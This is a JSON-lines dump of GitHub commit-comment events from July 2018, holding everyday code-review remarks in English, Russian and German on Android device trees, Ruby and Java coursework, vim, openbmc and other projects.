{"id":"8000820425","type":"CommitCommentEvent","actor":{"login":"AbdenbiWorks"},"repo":{"name":"benoummi/Todo"},"payload":{"comment":{"id":29794191,"position":11,"line":11,"path":"front-app/App.js","commit_id":"4b4f2f5b478862c72a9cffb02ff2437fc44484dc","created_at":"2018-07-22T20:30:56Z","updated_at":"2018-07-22T20:30:56Z","author_association":"NONE","body":"Hello Soufiane Hihi"}},"created_at":"2018-07-22T20:30:56Z"}
{"id":"8000820715","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794192,"position":26,"line":2840,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:31:09Z","updated_at":"2018-07-22T20:31:09Z","author_association":"MEMBER","body":"wew i forgot those , sed"}},"created_at":"2018-07-22T20:31:09Z"}
{"id":"8000821137","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794193,"position":5,"line":19,"path":"vendor.prop","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:31:28Z","updated_at":"2018-07-22T20:31:28Z","author_association":"MEMBER","body":"sachi?"}},"created_at":"2018-07-22T20:31:28Z"}
{"id":"8000821346","type":"CommitCommentEvent","actor":{"login":"seanysean"},"repo":{"name":"seanysean/LearnChess"},"payload":{"comment":{"id":29794194,"position":null,"line":null,"path":null,"commit_id":"d0fc6d732bd7c1bdfe9881bad586194516778aac","created_at":"2018-07-22T20:31:36Z","updated_at":"2018-07-22T20:31:36Z","author_association":"OWNER","body":"I meant stockfish.js in the commit description"}},"created_at":"2018-07-22T20:31:36Z"}
{"id":"8000821424","type":"CommitCommentEvent","actor":{"login":"3F"},"repo":{"name":"3F/DllExport"},"payload":{"comment":{"id":29794195,"position":null,"line":null,"path":null,"commit_id":"1279e5e02658628cdc3810b7583a8ec5919405e9","created_at":"2018-07-22T20:31:39Z","updated_at":"2018-07-22T20:31:39Z","author_association":"OWNER","body":"This also will fix problem with absolute path for `-packages` key. See related commit: https://github.com/3F/GetNuTool/commit/7bebfe4d263e728252826ee0164ea76fec37af56"}},"created_at":"2018-07-22T20:31:39Z"}
{"id":"8000823643","type":"CommitCommentEvent","actor":{"login":"SagarMakhar"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794199,"position":15,"line":2806,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:33:17Z","updated_at":"2018-07-22T20:33:17Z","author_association":"CONTRIBUTOR","body":"ims things are proprietary and should be in vendor\r\n"}},"created_at":"2018-07-22T20:33:17Z"}
{"id":"8000823794","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794200,"position":4,"line":2797,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:33:24Z","updated_at":"2018-07-22T20:33:24Z","author_association":"MEMBER","body":"we can move these to vendor too & sed during extract to change jar location"}},"created_at":"2018-07-22T20:33:24Z"}
{"id":"8000824606","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794201,"position":15,"line":2806,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:33:59Z","updated_at":"2018-07-22T20:33:59Z","author_association":"MEMBER","body":"thats what the line i said does ....."}},"created_at":"2018-07-22T20:33:59Z"}
{"id":"8000825851","type":"CommitCommentEvent","actor":{"login":"SagarMakhar"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794203,"position":5,"line":19,"path":"vendor.prop","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:34:53Z","updated_at":"2018-07-22T20:34:53Z","author_association":"CONTRIBUTOR","body":"kinda"}},"created_at":"2018-07-22T20:34:53Z"}
{"id":"8000827204","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794204,"position":61,"line":61,"path":"lesson3/train.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:35:54Z","updated_at":"2018-07-22T20:35:54Z","author_association":"NONE","body":"нет пустой строки в конце файла\r\n"}},"created_at":"2018-07-22T20:35:54Z"}
{"id":"8000827366","type":"CommitCommentEvent","actor":{"login":"tinapleez"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29794205,"position":null,"line":null,"path":null,"commit_id":"81fe10a47364d2484770d95498595dd8f71d3b24","created_at":"2018-07-22T20:36:02Z","updated_at":"2018-07-22T20:36:02Z","author_association":"NONE","body":"Hi ID2GO, the app bar menus do not yet have an instruction to delete. Right now it says:  // Do nothing for now"}},"created_at":"2018-07-22T20:36:02Z"}
{"id":"8000827692","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794206,"position":26,"line":26,"path":"lesson3/train.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:36:17Z","updated_at":"2018-07-22T20:36:17Z","author_association":"NONE","body":"можно получить отрицательно значение для количества вагонов"}},"created_at":"2018-07-22T20:36:17Z"}
{"id":"8000828505","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794207,"position":5,"line":19,"path":"vendor.prop","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:36:55Z","updated_at":"2018-07-22T20:36:55Z","author_association":"MEMBER","body":"never seen anthing aisa.. weird haina?"}},"created_at":"2018-07-22T20:36:55Z"}
{"id":"8000828734","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"WeekThor/MobsCash"},"payload":{"comment":{"id":29794208,"position":null,"line":null,"path":null,"commit_id":"850102f86ece8619a12bd3cc3d9e1f692461c1b6","created_at":"2018-07-22T20:37:06Z","updated_at":"2018-07-22T20:37:06Z","author_association":"NONE","body":"Dear @WeekThor:\nI regret to inform you that the release you submitted, named \"**MobsCash**\" (v0.2-Beta), for the project [MobsCash](https://poggit.pmmp.io/ci/WeekThor/MobsCash/MobsCash) on 2018-07-21T14:52:42.000Z, has been rejected.\n\nPlease provide a readable, and descriptive description. Don't just paste the config file without linebreaks to make it really awful to read.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-22T20:37:06Z"}
{"id":"8000828772","type":"CommitCommentEvent","actor":{"login":"SagarMakhar"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794209,"position":15,"line":2806,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:37:07Z","updated_at":"2018-07-22T20:37:07Z","author_association":"CONTRIBUTOR","body":"oh wait , yes "}},"created_at":"2018-07-22T20:37:07Z"}
{"id":"8000829206","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794210,"position":33,"line":33,"path":"lesson3/train.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:37:25Z","updated_at":"2018-07-22T20:37:25Z","author_association":"NONE","body":"зачем тут создается @station_next? \r\nесть же метод station_next"}},"created_at":"2018-07-22T20:37:25Z"}
{"id":"8000830538","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794212,"position":28,"line":28,"path":"lesson3/station.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:38:26Z","updated_at":"2018-07-22T20:38:26Z","author_association":"NONE","body":"нет пустой строки в конце"}},"created_at":"2018-07-22T20:38:26Z"}
{"id":"8000832714","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794216,"position":21,"line":21,"path":"lesson3/station.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:39:56Z","updated_at":"2018-07-22T20:39:56Z","author_association":"NONE","body":"плохое название метода\r\n\r\n`stations.trains = ` это обычно метод присваивания. \r\nОжидается, что после \r\n`station.trains=array`\r\nв `station.trains` будет находиться `array`\r\n\r\nлучше назвать метод add_train, arrive_train и т.д. "}},"created_at":"2018-07-22T20:39:56Z"}
{"id":"8000834190","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794218,"position":27,"line":27,"path":"lesson3/route.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:40:59Z","updated_at":"2018-07-22T20:40:59Z","author_association":"NONE","body":"в этом файле бардак с отступами и нет пустой строки в конце файла. \r\nнеобходимо настроить себе редактор. "}},"created_at":"2018-07-22T20:40:59Z"}
{"id":"8000834491","type":"CommitCommentEvent","actor":{"login":"wak-google"},"repo":{"name":"openbmc/openbmc"},"payload":{"comment":{"id":29794219,"position":null,"line":null,"path":null,"commit_id":"aad617f2cef143937204e78ee7b10da5d197420b","created_at":"2018-07-22T20:41:15Z","updated_at":"2018-07-22T20:41:15Z","author_association":"CONTRIBUTOR","body":"It seems like what you really want is dbus.socket as a dependency, not dbus.service. This is typical for systemd socket activated units, and what all of the `Type=dbus` units do implicitly. Theoretically this would relax ordering slightly so it could start the dbus service and mapper service in parallel and the mapper would block on the socket until the dbus service is up since systemd guarantees the socket to be available."}},"created_at":"2018-07-22T20:41:15Z"}
{"id":"8000834784","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29794221,"position":20,"line":20,"path":"lesson3/route.rb","commit_id":"f521bae8b13d7d67b4adbd3a0fa26341821fa94d","created_at":"2018-07-22T20:41:28Z","updated_at":"2018-07-22T20:41:28Z","author_association":"NONE","body":"так может быть удалена не только промежуточная, но и начальная/конечная станция. Необходимо добавить проверку"}},"created_at":"2018-07-22T20:41:28Z"}
{"id":"8000835026","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29794222,"position":137,"line":2367,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"33d80e80dbd676c13f304be797a8453c52fcd36d","created_at":"2018-07-22T20:41:39Z","updated_at":"2018-07-22T20:41:39Z","author_association":"NONE","body":"Validate that this length is between 1 and 4. I would issue an error and discard bytes if it doesn't fall in this expected range. You also need to grow the **buffer** array below in the code from **2*2** to **4*2**.  The buffer overflow you are currently experiencing when length is 3 or 4 probably explains the invalid data you see for 4 byte data."}},"created_at":"2018-07-22T20:41:39Z"}
{"id":"8000838020","type":"CommitCommentEvent","actor":{"login":"CFKevinRef"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29794225,"position":null,"line":null,"path":null,"commit_id":"2d9e2f30e17b8e79f2c44ef533ecdd550671304c","created_at":"2018-07-22T20:43:46Z","updated_at":"2018-07-22T20:43:46Z","author_association":"CONTRIBUTOR","body":"I'm the original author of that rewrite, just now coming back to RN. PR is here: https://github.com/facebook/react-native/pull/17967\r\n\r\n@jpshelley The rewrite just agrees more with the Android asset pipeline, so special casing like this should be less necessary. If the file in @janicduplessis's link works for you that will be great news!"}},"created_at":"2018-07-22T20:43:46Z"}
{"id":"8000838351","type":"CommitCommentEvent","actor":{"login":"josephj11"},"repo":{"name":"autokey/autokey"},"payload":{"comment":{"id":29794226,"position":5,"line":5,"path":"debian/changelog","commit_id":"1781fc3191cfc2f886fee0a477b52fd469f1dc41","created_at":"2018-07-22T20:44:02Z","updated_at":"2018-07-22T20:44:02Z","author_association":"NONE","body":"This change involved a lot of code (shown below) and the developer (the original author of AutoKey, Chris Dekter) has been gone from this project for several years. This was also done long before the (current) Python 3 branch of the project was forked.\r\n\r\nSo, someone would have to analyse the code from scratch to answer your question. Sorry."}},"created_at":"2018-07-22T20:44:02Z"}
{"id":"8000841667","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29794231,"position":29,"line":29,"path":"lesson3/station.rb","commit_id":"95cb6a768b0b957f19c91b07a65a3aa4f577aad5","created_at":"2018-07-22T20:46:25Z","updated_at":"2018-07-22T20:46:25Z","author_association":"NONE","body":"вот этот метод должен чуть-чуть по другому работать\r\nон должен брать массив поездов, фильтровать его по типу  и возвращать фильтрованный массив\r\n\r\nРекомендую посмотреть метод select для array"}},"created_at":"2018-07-22T20:46:25Z"}
{"id":"8000842309","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29794232,"position":30,"line":30,"path":"lesson3/train.rb","commit_id":"95cb6a768b0b957f19c91b07a65a3aa4f577aad5","created_at":"2018-07-22T20:46:55Z","updated_at":"2018-07-22T20:46:55Z","author_association":"NONE","body":"можно уйти в минус, необходимо добавить проверку"}},"created_at":"2018-07-22T20:46:55Z"}
{"id":"8000843354","type":"CommitCommentEvent","actor":{"login":"LikiPiki"},"repo":{"name":"LikiPiki/VueGoNotes"},"payload":{"comment":{"id":29794233,"position":14,"line":52,"path":"src/components/Notes.vue","commit_id":"8f124eb6f16dcb0cb4ab87e49b14adb40f439334","created_at":"2018-07-22T20:47:47Z","updated_at":"2018-07-22T20:47:47Z","author_association":"OWNER","body":"remove console log and check user time zone"}},"created_at":"2018-07-22T20:47:47Z"}
{"id":"8000844053","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29794234,"position":77,"line":77,"path":"lesson3/train.rb","commit_id":"95cb6a768b0b957f19c91b07a65a3aa4f577aad5","created_at":"2018-07-22T20:48:17Z","updated_at":"2018-07-22T20:48:17Z","author_association":"NONE","body":"Рекомендую добавить поле @route_index в котором будет храниться номер станции на маршруте. \r\nС ним код будет проще, и перемещения будут проще. "}},"created_at":"2018-07-22T20:48:17Z"}
{"id":"8000844500","type":"CommitCommentEvent","actor":{"login":"zeihng"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29794235,"position":null,"line":null,"path":null,"commit_id":"25a1a75e808c3311c54fd7a71a6c07836f6aa0bd","created_at":"2018-07-22T20:48:35Z","updated_at":"2018-07-22T20:48:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [abcd](https://trello.com/c/nVMCDprx/1-abcd)"}},"created_at":"2018-07-22T20:48:35Z"}
{"id":"8000845331","type":"CommitCommentEvent","actor":{"login":"AnMcCbusiness"},"repo":{"name":"woodrdk/CarRepairTracker"},"payload":{"comment":{"id":29794236,"position":null,"line":null,"path":null,"commit_id":"f8daf2966d114d97c36d8623ff623107a044116b","created_at":"2018-07-22T20:49:01Z","updated_at":"2018-07-22T20:49:01Z","author_association":"COLLABORATOR","body":"Deleted Unnecessary File"}},"created_at":"2018-07-22T20:49:01Z"}
{"id":"8000845640","type":"CommitCommentEvent","actor":{"login":"AnMcCbusiness"},"repo":{"name":"woodrdk/CarRepairTracker"},"payload":{"comment":{"id":29794237,"position":null,"line":null,"path":null,"commit_id":"68ab880e57c2c451c9187065f2f724d63f63981d","created_at":"2018-07-22T20:49:11Z","updated_at":"2018-07-22T20:49:11Z","author_association":"COLLABORATOR","body":"Deleted Unnecessary File"}},"created_at":"2018-07-22T20:49:11Z"}
{"id":"8000845826","type":"CommitCommentEvent","actor":{"login":"AnMcCbusiness"},"repo":{"name":"woodrdk/CarRepairTracker"},"payload":{"comment":{"id":29794238,"position":null,"line":null,"path":null,"commit_id":"859f4771ca8714defa61c9947333396002095be9","created_at":"2018-07-22T20:49:17Z","updated_at":"2018-07-22T20:49:17Z","author_association":"COLLABORATOR","body":"Deleted Unnecessary File"}},"created_at":"2018-07-22T20:49:17Z"}
{"id":"8000847241","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29794239,"position":null,"line":null,"path":null,"commit_id":"f22f3a1eaffb9a06fa8be7072277150f42ce2960","created_at":"2018-07-22T20:50:13Z","updated_at":"2018-07-22T20:50:13Z","author_association":"COLLABORATOR","body":"etwas zu lang..."}},"created_at":"2018-07-22T20:50:13Z"}
{"id":"8000849735","type":"CommitCommentEvent","actor":{"login":"JamesH65"},"repo":{"name":"raspberrypi/documentation"},"payload":{"comment":{"id":29794243,"position":15,"line":15,"path":"configuration/wireless/headless.md","commit_id":"8e5e7bdea0265d4e418fd508bd1db5a1f7c86873","created_at":"2018-07-22T20:51:59Z","updated_at":"2018-07-22T20:51:59Z","author_association":"CONTRIBUTOR","body":"This match was merged some time ago. Either add an issue if you think there is a problem here, or provide a PR"}},"created_at":"2018-07-22T20:51:59Z"}
{"id":"8000853476","type":"CommitCommentEvent","actor":{"login":"kain88-de"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":29794246,"position":9,"line":211,"path":"package/MDAnalysis/transformations/translate.py","commit_id":"212ca07cdc934479cf06b244cb29ec60c10a732b","created_at":"2018-07-22T20:54:40Z","updated_at":"2018-07-22T20:54:40Z","author_association":"MEMBER","body":"again those these are unnecessary. You only need the equality"}},"created_at":"2018-07-22T20:54:40Z"}
{"id":"8000854270","type":"CommitCommentEvent","actor":{"login":"mdubbbb"},"repo":{"name":"Deisun/Interpreter1"},"payload":{"comment":{"id":29794250,"position":null,"line":null,"path":null,"commit_id":"e62b902ec99a34bd630ebb34eada94fa17d6724a","created_at":"2018-07-22T20:55:14Z","updated_at":"2018-07-22T20:55:14Z","author_association":"NONE","body":"Awesome job on the interpreter and structure of your code, it is very easy to understand! Did you test out the interpreter? Curious to see what the test.scl code and results would look like. \r\n\r\n**Again, AWESOME JOB!** "}},"created_at":"2018-07-22T20:55:14Z"}
{"id":"8000854572","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_vendor_asus"},"payload":{"comment":{"id":29794251,"position":null,"line":null,"path":null,"commit_id":"6cfea3e745a0970ebd2bfb7a366686812e8eac92","created_at":"2018-07-22T20:55:29Z","updated_at":"2018-07-22T20:55:29Z","author_association":"MEMBER","body":" los vendor extractors ;("}},"created_at":"2018-07-22T20:55:29Z"}
{"id":"8000854939","type":"CommitCommentEvent","actor":{"login":"pbertsch"},"repo":{"name":"jelic98/dynamico"},"payload":{"comment":{"id":29794252,"position":null,"line":null,"path":null,"commit_id":"4e07c7295d0ebe43f867e97b606fc7497b859792","created_at":"2018-07-22T20:55:46Z","updated_at":"2018-07-22T20:55:46Z","author_association":"CONTRIBUTOR","body":"@jelic98 \r\nThe idea behind adding those attributes was to make it more flexible. "}},"created_at":"2018-07-22T20:55:46Z"}
{"id":"8000855034","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794253,"position":1,"line":1,"path":"Lesson6HW/spring-shell.log","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:55:50Z","updated_at":"2018-07-22T20:55:50Z","author_association":"NONE","body":"Это в .gitignore"}},"created_at":"2018-07-22T20:55:50Z"}
{"id":"8000855805","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29794255,"position":null,"line":null,"path":null,"commit_id":"2bc30a805fd124c6b8bb2a97ebdf0f6374a71752","created_at":"2018-07-22T20:56:24Z","updated_at":"2018-07-22T20:56:24Z","author_association":"OWNER","body":"Collision 589.5~589.6"}},"created_at":"2018-07-22T20:56:24Z"}
{"id":"8000857005","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794259,"position":27,"line":27,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/dao/author/AuthorDaoJDBC.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:57:21Z","updated_at":"2018-07-22T20:57:21Z","author_association":"NONE","body":"Настоятельно рекомендую использовать NamedParaterJdbcTemplate."}},"created_at":"2018-07-22T20:57:21Z"}
{"id":"8000857226","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794260,"position":16,"line":16,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/dao/author/AuthorDaoJDBC.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:57:31Z","updated_at":"2018-07-22T20:57:31Z","author_association":"NONE","body":"ТОгда уж JdbcOpertaions"}},"created_at":"2018-07-22T20:57:31Z"}
{"id":"8000857760","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794261,"position":45,"line":45,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/dao/author/AuthorDaoJDBC.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:57:56Z","updated_at":"2018-07-22T20:57:56Z","author_association":"NONE","body":"Вот тут теперь можно дико ошибиться без названий"}},"created_at":"2018-07-22T20:57:56Z"}
{"id":"8000857937","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29794262,"position":null,"line":null,"path":null,"commit_id":"a6bc222e6a43585465a584cf5cda2e816d56743c","created_at":"2018-07-22T20:58:05Z","updated_at":"2018-07-22T20:58:05Z","author_association":"MEMBER","body":"You can have functions without an implementation in abstracts too (`@:op`) methods."}},"created_at":"2018-07-22T20:58:05Z"}
{"id":"8000858179","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794264,"position":18,"line":18,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/dao/author/AuthorRowMapper.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:58:16Z","updated_at":"2018-07-22T20:58:16Z","author_association":"NONE","body":"И я бы это лямбдой бы сделал."}},"created_at":"2018-07-22T20:58:16Z"}
{"id":"8000859324","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794268,"position":21,"line":21,"path":"Lesson6HW/src/main/java/ru/otus/lesson6hw/domain/Author.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T20:59:07Z","updated_at":"2018-07-22T20:59:07Z","author_association":"NONE","body":"Сеттеры Вы даже почти и не используете, можно и без них - код чище станет."}},"created_at":"2018-07-22T20:59:07Z"}
{"id":"8000859711","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794269,"position":19,"line":26,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T20:59:24Z","updated_at":"2018-07-22T20:59:24Z","author_association":"COLLABORATOR","body":"Why do we even need this thing?"}},"created_at":"2018-07-22T20:59:24Z"}
{"id":"8000860613","type":"CommitCommentEvent","actor":{"login":"maruel"},"repo":{"name":"periph/extra"},"payload":{"comment":{"id":29794275,"position":null,"line":null,"path":null,"commit_id":"13b556e50dfea26b884626c5402343c3399104d4","created_at":"2018-07-22T21:00:04Z","updated_at":"2018-07-22T21:00:04Z","author_association":"CONTRIBUTOR","body":"gohci"}},"created_at":"2018-07-22T21:00:04Z"}
{"id":"8000861597","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794280,"position":21,"line":21,"path":"BsuirFind.Foundation.Dto/Games/GameTaskDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:00:41Z","updated_at":"2018-07-22T21:00:41Z","author_association":"COLLABORATOR","body":"Why? Why does this entity exist?"}},"created_at":"2018-07-22T21:00:41Z"}
{"id":"8000862714","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794281,"position":23,"line":30,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:01:27Z","updated_at":"2018-07-22T21:01:27Z","author_association":"COLLABORATOR","body":"Same here."}},"created_at":"2018-07-22T21:01:27Z"}
{"id":"8000863854","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794283,"position":32,"line":32,"path":"Lesson6HW/src/test/java/ru/otus/lesson6hw/AuthorTest.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T21:02:14Z","updated_at":"2018-07-22T21:02:14Z","author_association":"NONE","body":"Ага - неа, не получится, лучше его мокать.\r\n\r\nСинтаксис SQL у базы другой. Чтобы честно тестировать, нужно импользовать Docker и поднимать mysql в контейнере. Не нужно пытаться в таком случае выполнить запрос.\r\n\r\nА вот если сделаете mock - то можно подставить его в DAO и протестировать, например, какие Вы параметры передаёте в SQL и есть ли нужные конструкции в SQL-нике"}},"created_at":"2018-07-22T21:02:14Z"}
{"id":"8000863876","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794284,"position":25,"line":32,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:02:15Z","updated_at":"2018-07-22T21:02:15Z","author_association":"COLLABORATOR","body":"Same here. Since we are setting cost for every quest added to game, why do we need this field?"}},"created_at":"2018-07-22T21:02:15Z"}
{"id":"8000865267","type":"CommitCommentEvent","actor":{"login":"dpelle"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29794285,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T21:03:18Z","updated_at":"2018-07-22T21:03:18Z","author_association":"NONE","body":"Did you also uncomment out this  line in src/Makefile, so that vim frees all data structures before exiting? This is only useful to avoid spurious leak reports:\r\n{noformat}\r\ndiff --git a/src/Makefile b/src/Makefile\r\nindex f2fafa4dc..f09137e73 100644\r\n--- a/src/Makefile\r\n+++ b/src/Makefile\r\n@@ -699,12 +699,12 @@ SANITIZER_LIBS = $(SANITIZER_CFLAGS)\r\n # Configuration is in the .ccmalloc or ~/.ccmalloc file.\r\n # Doesn't work very well, since memory linked to from global variables\r\n # (in libraries) is also marked as leaked memory.\r\n-#LEAK_CFLAGS = -DEXITFREE\r\n+LEAK_CFLAGS = -DEXITFREE\r\n #LEAK_LIBS = -lccmalloc\r\n{noformat}"}},"created_at":"2018-07-22T21:03:18Z"}
{"id":"8000866079","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29794287,"position":14,"line":14,"path":"Lesson6HW/src/test/java/ru/otus/lesson6hw/Config.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-22T21:03:56Z","updated_at":"2018-07-22T21:03:56Z","author_association":"NONE","body":"Тогда уж `@Bean`"}},"created_at":"2018-07-22T21:03:56Z"}
{"id":"8000867346","type":"CommitCommentEvent","actor":{"login":"marianexyx"},"repo":{"name":"marianexyx/chess_web_files"},"payload":{"comment":{"id":29794288,"position":null,"line":null,"path":null,"commit_id":"ef93dd56087d720e330412e6a917d03938237ee3","created_at":"2018-07-22T21:04:55Z","updated_at":"2018-07-22T21:04:55Z","author_association":"OWNER","body":"Everything worked cool, but tests were superficial."}},"created_at":"2018-07-22T21:04:55Z"}
{"id":"8000869604","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794291,"position":19,"line":26,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:06:29Z","updated_at":"2018-07-22T21:06:29Z","author_association":"OWNER","body":"@gmltA \r\nWhat thing?"}},"created_at":"2018-07-22T21:06:29Z"}
